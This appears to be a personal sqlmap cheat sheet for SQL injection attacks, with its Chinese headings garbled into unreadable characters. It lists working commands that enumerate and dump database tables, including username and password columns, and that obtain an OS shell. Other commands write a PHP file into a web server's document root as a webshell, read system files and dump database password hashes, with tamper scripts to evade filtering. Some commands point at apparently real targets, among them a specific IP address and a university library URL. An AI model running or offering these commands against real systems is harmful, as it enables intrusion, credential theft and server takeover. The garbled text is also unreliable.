sqlmapʹʵ
/pentest/database/sqlmapupdate :::::> in the folder afterexecute following order : svn update
sqlmap.py -r 1.txt --current-db
v 3 Cdbms MySQL Ctechnique U -p id Cbatch Ctamper space2morehash.py
==================ʹ÷==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
½ݿ
./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
½
./sqlmap.py -u "injection-url" -D database_name --tables
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
sqlmap.py -r 1.txt -v 3 --dbs--batch --tamper "space2morehash.py" ƹǽ
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
½
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
½ֵ
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
аmanaַ
/sqlmap.py -u "injection-url" -T mana --search
һʽsql shell
/sqlmap.py -u "injection-url" --sql-shell
ȡָļȨޣ
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
鿴ǰ û ݿ
/sqlmap.py -u "injection-url" --current-user --current-db
ļ д ԶĿ·
/sqlmap.py -u "injection-url" --file-write · --file-dest Զ̾·
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
sqlmap.py -u "injection-url" --file-write · --file-dest Զ̾·
鿴ijõȨ
/sqlmap.py -u "injection-url" --privileges -U root
鿴ǰûǷΪdba
/sqlmap.py -u "injection-url" --is-dba
ȡݿûָݿû
sqlmap.py -r 1.txt --users --passwords
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
/sqlmap.py -u "injection-url" --passwords -U root
--start&&--stop --first&&--last
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump --start=1 --stop=2 гڶ¼¼磺0 1 2 3
ֵв(ڱƽ)ڵısqlmap/txt/common-tables.txtֶΣsqlmap/txt/common-columns.txt
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
ִsql䣬ѯ@@datadirõݿ·user()/database()ȵȡ
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
ҳ:
[1]